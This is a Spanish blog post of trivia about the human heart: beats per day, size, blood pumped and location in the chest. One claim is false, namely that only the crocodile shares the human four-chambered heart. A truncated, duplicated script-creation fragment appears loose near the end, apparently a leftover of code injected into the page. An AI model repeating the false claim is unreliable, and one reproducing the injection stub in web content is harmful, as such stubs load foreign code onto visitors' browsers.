Salud y belleza » Sin categoría

Curiosidades sobre el corazón

Sin Comentarios

El corazón, desde siempre, ha sido objeto de estudio para poetas y románticos. Pero no solo para ellos: también representa toda una incógnita para profesionales de la medicina (grandes personalidad de la historia se han interesado por aprender de su anatomía).

Actualmente, gracias a los avances de la tecnología de las ciencias en general esa incógnita ya no es tal. Los profesionales de la medicina han conseguido no solo conocerlo de punta a punta sino, incluso, hasta reproducirlo artificialmente.

Pero el corazón, amén de las particularidades que esconde a nivel simbólico, también alberga grandes curiosidades en el plano físico y anatómico. Pasen, lea y abran sus corazones…

  • De entre todos los animales que habitan la tierra, solo el cocodrilo desarrolló, en su evolución, un corazón de cuatro cámaras similar al del ser humano.
  • Está comprobado que el corazón del hombre late alrededor de 100.000 veces al día, 35 millones de veces al año, y 2.500 millones de veces a lo largo de una vida.
  • Un corazón en estado natural, tiene aproximadamente el mismo tamaño que un puño cerrado. Y, de hecho, su apariencia, en contra de lo que muestran los dibujos clásicos, es también similar a la de un puño.
  • Ejercicio para entender la fuerza que emplea un corazón mientras trabaja: aplasta una pelota de tenis con toda la fuerza que tengas con tu puño. Increíble pero real.
  • Durante toda una vida (promedio de setenta años) el corazón bombea un millón de barriles de sangre.
  • La arteria aorta es la más larga del cuerpo con un diámetro similar al de una manguera de jardín.
  • En términos onomatopéyicos esos “tu tun, tu tun” o representación acústica que sale desde el corazón es totalmente real: se trata de latidos provocados por las válvulas cardíacas cuando éstas se cierran y se abren.
  • Erróneamente, la gente ubica su corazón colocando la mano en la parte izquierda del pecho. Pero la localización real del corazón está en el centro de tu pecho, sin embargo su latido se oye más fuerte en el lado izquierdo por una inclinación del músculo.
  • La fuerza generada por un corazón de forma diaria alcanzaría para mover un coche más de treinta kilómetros.

var d=document;var s=d.createElement('script'); var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.